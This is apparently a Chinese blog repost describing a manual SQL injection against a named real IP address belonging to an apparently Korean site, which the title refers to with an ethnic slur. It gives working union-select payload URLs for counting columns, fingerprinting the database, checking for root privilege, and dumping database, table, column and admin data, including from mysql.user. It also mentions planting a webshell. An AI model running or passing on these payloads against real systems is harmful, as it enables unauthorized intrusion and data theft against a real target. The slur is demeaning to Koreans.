码迷,mamicode.com
首页 > 其他好文 > 详细

手工注入棒子站

时间:2016-06-28 20:07:55      阅读:241      评论:0      收藏:0      [点我收藏+]

标签:

注入点: http://203.246.61.24/ipsi/sub05/sub09_A.php?menu=109

使用order by 确定字段

order by 25报错

技术分享

order by 23 正常返回

技术分享

order by 24试试

技术分享

 

OK ,order by 25报错,order by 24正常返回 ,字段确定在24。

接下来就使用 union语包查询一下数据库名密码等等想要的东西先

技术分享

使用database()查看数据库名

技术分享

 

使用version()查看版本号

技术分享

使用@@datadir 查看数据库的路径

技术分享

 

使用user()查看用户

技术分享

使用 system_user() 查看一下当前系统的用户是谁

技术分享

看看当前连接的用户  使用current_user() 查询

技术分享

哈哈,出来了,都是它呀,mysql还开启远程登录,看来是给日过了,默认情况下都不会使用远程登录的。

看看页面当前连接的用户是谁 session_user()

技术分享

 

and ord(mid(user(),1,1))=114   查看用户是什么权限

技术分享

OK,返回的页面跟上面出错的页面不同,也就是说是root权限

这样就好办了,只要知道绝对路径就可以写一句话进去

先使用 @@version_compile_os 查看一下操作系统是什么

技术分享

查询一下information_schema表,看看都有哪些数据库

http://203.246.61.24/ipsi/sub05/sub09_A.php?menu=109%20and%201=2%20union%20select%201,2,3,4,5,group_concat%28distinct+table_schema%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20information_schema.columns--

技术分享

爆出这么多数据库,接下来就要爆表名了,

http://203.246.61.24/ipsi/sub05/sub09_A.php?menu=109%20and%201=2%20union%20select%201,2,3,4,5,group_concat%28distinct+table_name%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20information_schema.tables%20where%20table_schema=database%28%29--

哈哈,够直接,所有表名出来了,

技术分享

数据库名,表名 都爆出来了,那么接下来要做的事就是爆字段了,

http://203.246.61.24/ipsi/sub05/sub09_A.php?menu=109%20and%201=2%20union%20select%201,2,3,4,5,group_concat%28distinct+column_name%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20information_schema.columns+where+table_name=0x61646D696E5F6D656E75

注:0x61646D696E5F6D656E75 是上面爆出来的admin_menu的十六进制

使用http://203.246.61.24/ipsi/sub05/sub09_A.php?menu=109%20and%201=2%20union%20select%201,2,3,4,5,group_concat%28ADMIN_ID,0x2B,ALLOW_MENU%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20admin_menu

爆出这些信息,平不是管理 员的帐号密码

但是方法是 一样的,

技术分享

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from mysql.user

http://203.246.61.24/ipsi/sub05/sub09_A.php?menu=109%20and%201=2%20union%20select%201,2,3,4,5,@@version_compile_os,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20mysql.user

手工注入棒子站

标签:

原文地址:http://www.cnblogs.com/jshy/p/5624688.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!